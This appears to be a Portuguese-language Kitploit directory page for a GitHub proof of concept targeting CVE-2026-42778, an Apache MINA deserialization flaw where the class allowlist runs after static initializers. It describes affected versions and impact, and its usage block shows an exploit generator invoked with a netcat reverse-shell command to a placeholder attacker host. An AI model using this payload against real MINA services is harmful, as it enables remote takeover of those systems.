Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 Desserialização de Dados Não Confiáveis (CWE-502) | Kitploit
Ferramentas/GitHubGitHub/akinfue/cve-2026-42778-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebDesenvolvimento de PayloadsExploração de Binários
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 Desserialização de Dados Não Confiáveis (CWE-502)

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42778

Visão Geral

Correção incompleta no método AbstractIoBuffer.getObject() do Apache MINA. A validação da lista de permissões de nomes de classes, que restringe quais classes podem ser desserializadas, é aplicada tarde demais, após os inicializadores estáticos nas classes em leitura já terem sido executados. Isso ocorre porque a correção original para a CVE-2024-52046 não foi aplicada corretamente aos ramos 2.1.X e 2.2.X. Versões afetadas: - Apache MINA 2.1.0 até 2.1.11 - Apache MINA 2.2.0 até 2.2.6

Exploit:

Baixar aqui

Detalhes

  • ID da CVE: CVE-2026-42778

  • Publicada: 05/01/2026

  • Impacto: Crítico

  • Disponibilidade do Exploit: Não público, apenas privado.

  • CVSS: 9.8

  • Patch Disponível: (Nenhum patch oficial ainda)

Impacto

Um atacante pode criar objetos serializados maliciosos que, ao serem processados por IoBuffer.getObject(), executam código arbitrário por meio de inicializadores estáticos antes que a validação da lista de permissões de nomes de classes ocorra. Como esta é uma vulnerabilidade acessível pela rede que não exige privilégios ou interação do usuário, a execução remota de código é possível em qualquer aplicação que use Apache MINA e chame o método IoBuffer.getObject(). A vulnerabilidade permite o comprometimento total da confidencialidade, integridade e disponibilidade dos sistemas afetados.

Versões Afetadas

  • Apache MINA 2.1.0 até 2.1.11
  • Apache MINA 2.2.0 até 2.2.6

Uso

root@kitploit:~
# Compilar e gerar
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# Enviar pela rede para o serviço baseado em MINA usando ObjectSerializationCodecFactory
# ou qualquer endpoint que chame IoBuffer.getObject()

Contato

  • Para dúvidas, entre em contato:[email protected]
  • Exploit : aqui
Baixar ferramenta